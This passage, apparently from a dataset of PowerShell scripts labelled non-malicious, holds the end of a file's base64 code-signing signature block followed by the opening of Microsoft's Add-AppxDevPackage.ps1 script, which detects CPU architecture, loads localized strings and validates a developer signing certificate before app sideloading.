9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEII3w # xI1xSVVKASXhbtY7YrZIC2LhVGZo8wfM77j0IL/bMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEABAlCgrWGFH38884KqUX98Lq2/rPhkMgq3t4E # d0ujvj8OeU5I4JpHcaTBBqlC7nzc4WRcE0vASuV4LZxqCEEpTnbA+a9SEk548aag # lgCwrFGXwC0mrtUkyM/DahNXPQe7R0hPWNCoEoKM9AMyzB2FmtdxPlPXwSNE4eKY # 7TeUBV3g776j2hrvhXx4hkw6VruOaTgx2oMHnWpbiT9eGRwVKa2BEAIwvIQC8rEu # xg+WYigp7CQsO+Q92nhF/pPKOB3TXelQ+xqKIbBuzEHD1sNzxEKrJbMhEvZuFL9K # zrw4yTH/X8Jz8xRKFFfQGq2x8TPTOvNYxyWlWBMSBpRwsd/JxKGCF5QwgheQBgor # BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCDdpZxdzUCpvM4i9xeqZ8uDt8gA6reQ9dZH # UAqBF0HNCAIGZxqItyNJGBMyMDI0MTAyODExNDA0My40NjZaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046MzcwMy0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAeqaJHLVWT9hYwAB # AAAB6jANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1MzBaFw0yNTAzMDUxODQ1MzBaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC1C1/xSD8gB9X7Ludoo2rW # b2ksqaF65QtJkbQpmsc6G4bg5MOv6WP/uJ4XOJvKX/c1t0ej4oWBqdGD6VbjXX4T # 0KfylTulrzKtgxnxZh7q1uD0Dy/w5G0DJDPb6oxQrz6vMV2Z3y9ZxjfZqBnDfqGo # n/4VDHnZhdas22svSC5GHywsQ2J90MM7L4ecY8TnLI85kXXTVESb09txL2tHMYrB # +KHCy08ds36an7IcOGfRmhHbFoPa5om9YGpVKS8xeT7EAwW7WbXL/lo5p9KRRIjA # lsBBHD1TdGBucrGC3TQXSTp9s7DjkvvNFuUa0BKsz6UiCLxJGQSZhd2iOJTEfJ1f # xYk2nY6SCKsV+VmtV5aiPzY/sWoFY542+zzrAPr4elrvr9uB6ci/Kci//EOERZEU # TBPXME/ia+t8jrT2y3ug15MSCVuhOsNrmuZFwaRCrRED0yz4V9wlMTGHIJW55iNM # 3HPVJJ19vOSvrCP9lsEcEwWZIQ1FCyPOnkM1fs7880dahAa5UmPqMk5WEKxzDPVp # 081X5RQ6HGVUz6ZdgQ0jcT59EG+CKDPRD6mx8ovzIpS/r/wEHPKt5kOhYrjyQHXc # 9KHKTWfXpAVj1Syqt5X4nr+Mpeubv+N/PjQEPr0iYJDjSzJrqILhBs5pytb6vyR8 # HUVMp+mAA4rXjOw42vkHfQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFCuBRSWiUebp # F0BU1MTIcosFblleMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQAog61WXj9+/nxV # bX3G37KgvyoNAnuu2w3HoWZj3H0YCeQ3b9KSZThVThW4iFcHrKnhFMBbXJX4uQI5 # 3kOWSaWCaV3xCznpRt3c4/gSn3dvO/1GP3MJkpJfgo56CgS9zLOiP31kfmpUdPqe # kZb4ivMR6LoPb5HNlq0WbBpzFbtsTjNrTyfqqcqAwc6r99Df2UQTqDa0vzwpA8Cx # iAg2KlbPyMwBOPcr9hJT8sGpX/ZhLDh11dZcbUAzXHo1RJorSSftVa9hLWnzxGzE # GafPUwLmoETihOGLqIQlCpvr94Hiak0Gq0wY6lduUQjk/lxZ4EzAw/cGMek8J3Qd # iNS8u9ujYh1B7NLr6t3IglfScDV3bdVWet1itTUoKVRLIivRDwAT7dRH13Cq32j2 # JG5BYu/XitRE8cdzaJmDVBzYhlPl9QXvC+6qR8I6NIN/9914bTq/S4g6FF4f1dix # UxE4qlfUPMixGr0Ft4/S0P4fwmhs+WHRn62PB4j3zCHixKJCsRn9IR3ExBQKQdMi # 5auiqB6xQBADUf+F7hSKZfbA8sFSFreLSqhvj+qUQF84NcxuaxpbJWVpsO18IL4Q # bt45Cz/QMa7EmMGNn7a8MM3uTQOlQy0u6c/jq111i1JqMjayTceQZNMBMM5EMc5D # r5m3T4bDj9WTNLgP8SFe3EqTaWVMOTCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjM3MDMtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQCJ2x7cQfjpRskJ8UGIctOCkmEkj6CBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smkOTAi # GA8yMDI0MTAyODA1NDg0MVoYDzIwMjQxMDI5MDU0ODQxWjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDqyaQ5AgEAMAcCAQACAgZUMAcCAQACAhPVMAoCBQDqyvW5AgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAFfF191Vr1N1sln3mHz61HMNMQEg # Ea636VH1IhLDsW3Fa0ADcc4HhLIGewlJNoGCXcZBml5HEec91aylUr95ZJqXwUeq # PPb9X5bmbVFXObHp67WigFKCbNOFbIiG8ecu331cmM1GqdiZAhT6hW4gc/LC7F/n # qvDz8msZXcAtE96/FvXd43LKJVHk/kN5IP3SUKVHfZo6zUQvLAaoPylUdoYADAn6 # hMlUIcog3CD8TCcit1MWEuBxZZBPsBMJdzSNeM+RfcmNb6nEzgkv8hGAlRMFGEp/ # jpNVEuQ5uey+mvVyZ/KaPkY+I4n2Y/SEuQKBMvP6FLyr9gfGyH8jpbHQG8gxggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAeqa # JHLVWT9hYwABAAAB6jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCDDsNkkWR0Ru4zcNJfjunNX8twH # 9OZCJMioKeiPBV9OZTCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICmPodXj # ZDR4iwg0ltLANXBh5G1uKqKIvq8sjKekuGZ4MIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHqmiRy1Vk/YWMAAQAAAeowIgQgLTk9jKlH # i0Od4rfyi3FO/mCmLpu/ZxHUB/cVCTvgf/QwDQYJKoZIhvcNAQELBQAEggIAbO7e # YMjPv7dUAHPzgkUiQrtTK95aiXIfBmvT/e1K5rrBiVHzlmopq9fmhm0ki0bhJ/jS # Zw5IDY4wgiaLZmKetxmSDpp2/y8INnJDMlenUGbH4X+p4h8n1hc5kJXZ3ruX8O99 # 7wEwrjaRFynJvAvVXOkiRYMLddF7+d3w07tECDCfQMFplR7aV2ZALpDWeG2TO3Y6 # cTpOr+GjPm4rGV50lwftmPPZ2GRIe6YnskIhPxvMOG5+xY66bd2NZRPHQlggR5pm # EHe4WyCaWmeyhN9MweQHmf2N8j20XJmCK/2ygvgQpfQuM0HW6bV/IU5nYrnJuxRW # Njf1FBJrpVN+7zq7AXEqoDbjXSRxSBAmx8i5RAig1oxWctn6eeWgvzc7FSqArP/j # QsroJcIqQ0akphI3ks/k8oRRweFq976aK4kCYfYJA+nQ2j1e2Ltagci4p4jIKhfv # YwN083Nperj4bovzHiz6U1viiYq6gSZWYaA4Ew7bf18AGaWMbIiGVAVKdVqT9SKr # 7JdU8PRHsD/FPK0zUlDm593AWViVI95sFqj3X9brGvFH1N0aGBgQCduqGyeTgX3S # zRli3Fpari/b+fbdJzrdy54dpsqu88U9tBDreViVQ2YAYlGpApnaOueob25O0MKD # pG3LEjT8czMCS21uG9WKAz2aIL0lL2JK/zye8a0= # SIG # End signature block
combined_dataset/train/non-malicious/sample_15_5.ps1
sample_15_5.ps1
# # Add-AppxDevPackage.ps1 is a PowerShell script designed to install app # packages created by Visual Studio for developers. To run this script from # Explorer, right-click on its icon and choose "Run with PowerShell". # # Visual Studio supplies this script in the folder generated with its # "Prepare Package" command. The same folder will also contain the app # package (a .appx file), the signing certificate (a .cer file), and a # "Dependencies" subfolder containing all the framework packages used by the # app. # # This script simplifies installing these packages by automating the # following functions: # 1. Find the app package and signing certificate in the script directory # 2. Prompt the user to acquire a developer license and to install the # certificate if necessary # 3. Find dependency packages that are applicable to the operating system's # CPU architecture # 4. Install the package along with all applicable dependencies # # All command line parameters are reserved for use internally by the script. # Users should launch this script from Explorer. # # .Link # http://go.microsoft.com/fwlink/?LinkId=243053 param( [switch]$Force = $false, [switch]$GetDeveloperLicense = $false, [switch]$SkipLoggingTelemetry = $false, [string]$CertificatePath = $null ) $ErrorActionPreference = "Stop" # The language resources for this script are placed in the # "Add-AppDevPackage.resources" subfolder alongside the script. Since the # current working directory might not be the directory that contains the # script, we need to create the full path of the resources directory to # pass into Import-LocalizedData $ScriptPath = $null try { $ScriptPath = (Get-Variable MyInvocation).Value.MyCommand.Path $ScriptDir = Split-Path -Parent $ScriptPath } catch {} if (!$ScriptPath) { PrintMessageAndExit $UiStrings.ErrorNoScriptPath $ErrorCodes.NoScriptPath } $LocalizedResourcePath = Join-Path $ScriptDir "Add-AppDevPackage.resources" Import-LocalizedData -BindingVariable UiStrings -BaseDirectory $LocalizedResourcePath $ErrorCodes = Data { ConvertFrom-StringData @' Success = 0 NoScriptPath = 1 NoPackageFound = 2 ManyPackagesFound = 3 NoCertificateFound = 4 ManyCertificatesFound = 5 BadCertificate = 6 PackageUnsigned = 7 CertificateMismatch = 8 ForceElevate = 9 LaunchAdminFailed = 10 GetDeveloperLicenseFailed = 11 InstallCertificateFailed = 12 AddPackageFailed = 13 ForceDeveloperLicense = 14 CertUtilInstallFailed = 17 CertIsCA = 18 BannedEKU = 19 NoBasicConstraints = 20 NoCodeSigningEku = 21 InstallCertificateCancelled = 22 BannedKeyUsage = 23 ExpiredCertificate = 24 '@ } $IMAGE_FILE_MACHINE_i386 = 0x014c $IMAGE_FILE_MACHINE_AMD64 = 0x8664 $IMAGE_FILE_MACHINE_ARM64 = 0xAA64 $IMAGE_FILE_MACHINE_ARM = 0x01c0 $IMAGE_FILE_MACHINE_THUMB = 0x01c2 $IMAGE_FILE_MACHINE_ARMNT = 0x01c4 $MACHINE_ATTRIBUTES_UserEnabled = 0x01 $MACHINE_ATTRIBUTES_KernelEnabled = 0x02 $MACHINE_ATTRIBUTES_Wow64Container = 0x04 # First try to use IsWow64Process2 to determine the OS architecture try { $IsWow64Process2_MethodDefinition = @" [DllImport("kernel32.dll", SetLastError = true)] public static extern bool IsWow64Process2(IntPtr process, out ushort processMachine, out ushort nativeMachine); "@ $Kernel32 = Add-Type -MemberDefinition $IsWow64Process2_MethodDefinition -Name "Kernel32" -Namespace "Win32" -PassThru $Proc = Get-Process -id $pid $processMachine = New-Object uint16 $nativeMachine = New-Object uint16 $Res = $Kernel32::IsWow64Process2($Proc.Handle, [ref] $processMachine, [ref] $nativeMachine) if ($Res -eq $True) { switch ($nativeMachine) { $IMAGE_FILE_MACHINE_i386 { $ProcessorArchitecture = "x86" } $IMAGE_FILE_MACHINE_AMD64 { $ProcessorArchitecture = "amd64" } $IMAGE_FILE_MACHINE_ARM64 { $ProcessorArchitecture = "arm64" } $IMAGE_FILE_MACHINE_ARM { $ProcessorArchitecture = "arm" } $IMAGE_FILE_MACHINE_THUMB { $ProcessorArchitecture = "arm" } $IMAGE_FILE_MACHINE_ARMNT { $ProcessorArchitecture = "arm" } } } } catch { # Ignore exception and fall back to using environment variables to determine the OS architecture } $Amd64AppsSupportedOnArm64 = $False if ($null -eq $ProcessorArchitecture) { $ProcessorArchitecture = $Env:Processor_Architecture # Getting $Env:Processor_Architecture on arm64 machines will return x86. So check if the environment # variable "ProgramFiles(Arm)" is also set, if it is we know the actual processor architecture is arm64. # The value will also be x86 on amd64 machines when running the x86 version of PowerShell. if ($ProcessorArchitecture -eq "x86") { if ($null -ne ${Env:ProgramFiles(Arm)}) { $ProcessorArchitecture = "arm64" } elseif ($null -ne ${Env:ProgramFiles(x86)}) { $ProcessorArchitecture = "amd64" } } } elseif ("arm64" -eq $ProcessorArchitecture) { # If we successfully determined the OS to be arm64 with the above call to IsWow64Process2 and we're on Win11+ # we need to check for a special case where amd64 apps are supported as well. if ([Environment]::OSVersion.Version -ge (new-object 'Version' 10,0,22000)) { try { $GetMachineTypeAttributes_MethodDefinition = @" [DllImport("api-ms-win-core-processthreads-l1-1-7.dll", EntryPoint = "GetMachineTypeAttributes", ExactSpelling = true, PreserveSig = false)] public static extern void GetMachineTypeAttributes(ushort Machine, out ushort machineTypeAttributes); "@ $ProcessThreads = Add-Type -MemberDefinition $GetMachineTypeAttributes_MethodDefinition -Name "processthreads_l1_1_7" -Namespace "Win32" -PassThru $machineTypeAttributes = New-Object uint16 $ProcessThreads::GetMachineTypeAttributes($IMAGE_FILE_MACHINE_AMD64, [ref] $machineTypeAttributes) # We're looking for the case where the UserEnabled flag is set if (($machineTypeAttributes -band $MACHINE_ATTRIBUTES_UserEnabled) -ne 0) { $Amd64AppsSupportedOnArm64 = $True } } catch { # Ignore exceptions and maintain assumption that amd64 apps aren't supported on this machine } } } function PrintMessageAndExit($ErrorMessage, $ReturnCode) { Write-Host $ErrorMessage try { # Log telemetry data regarding the use of the script if possible. # There are three ways that this can be disabled: # 1. If the "TelemetryDependencies" folder isn't present. This can be excluded at build time by setting the MSBuild property AppxLogTelemetryFromSideloadingScript to false # 2. If the SkipLoggingTelemetry switch is passed to this script. # 3. If Visual Studio telemetry is disabled via the registry. $TelemetryAssembliesFolder = (Join-Path $PSScriptRoot "TelemetryDependencies") if (!$SkipLoggingTelemetry -And (Test-Path $TelemetryAssembliesFolder)) { $job = Start-Job -FilePath (Join-Path $TelemetryAssembliesFolder "LogSideloadingTelemetry.ps1") -ArgumentList $TelemetryAssembliesFolder, "VS/DesignTools/SideLoadingScript/AddAppDevPackage", $ReturnCode, $ProcessorArchitecture Wait-Job -Job $job -Timeout 60 | Out-Null } } catch { # Ignore telemetry errors } if (!$Force) { Pause } exit $ReturnCode } # # Warns the user about installing certificates, and presents a Yes/No prompt # to confirm the action. The default is set to No. # function ConfirmCertificateInstall { $Answer = $host.UI.PromptForChoice( "", $UiStrings.WarningInstallCert, [System.Management.Automation.Host.ChoiceDescription[]]@($UiStrings.PromptYesString, $UiStrings.PromptNoString), 1) return $Answer -eq 0 } # # Validates whether a file is a valid certificate using CertUtil. # This needs to be done before calling Get-PfxCertificate on the file, otherwise # the user will get a cryptic "Password: " prompt for invalid certs. # function ValidateCertificateFormat($FilePath) { # certutil -verify prints a lot of text that we don't need, so it's redirected to $null here certutil.exe -verify $FilePath > $null if ($LastExitCode -lt 0) { PrintMessageAndExit ($UiStrings.ErrorBadCertificate -f $FilePath, $LastExitCode) $ErrorCodes.BadCertificate } # Check if certificate is expired $cert = Get-PfxCertificate $FilePath if (($cert.NotBefore -gt (Get-Date)) -or ($cert.NotAfter -lt (Get-Date))) { PrintMessageAndExit ($UiStrings.ErrorExpiredCertificate -f $FilePath) $ErrorCodes.ExpiredCertificate } } # # Verify that the developer certificate meets the following restrictions: # - The certificate must contain a Basic Constraints extension, and its # Certificate Authority (CA) property must be false. # - The certificate's Key Usage extension must be either absent, or set to # only DigitalSignature. # - The certificate must contain an Extended Key Usage (EKU) extension with # Code Signing usage. # - The certificate must NOT contain any other EKU except Code Signing and # Lifetime Signing. # # These restrictions are enforced to decrease security risks that arise from # trusting digital certificates. # function CheckCertificateRestrictions { Set-Variable -Name BasicConstraintsExtensionOid -Value "2.5.29.19" -Option Constant Set-Variable -Name KeyUsageExtensionOid -Value "2.5.29.15" -Option Constant Set-Variable -Name EkuExtensionOid -Value "2.5.29.37" -Option Constant Set-Variable -Name CodeSigningEkuOid -Value "1.3.6.1.5.5.7.3.3" -Option Constant Set-Variable -Name LifetimeSigningEkuOid -Value "1.3.6.1.4.1.311.10.3.13" -Option Constant Set-Variable -Name UwpSigningEkuOid -Value "1.3.6.1.4.1.311.84.3.1" -Option Constant Set-Variable -Name DisposableSigningEkuOid -Value "1.3.6.1.4.1.311.84.3.2" -Option Constant $CertificateExtensions = 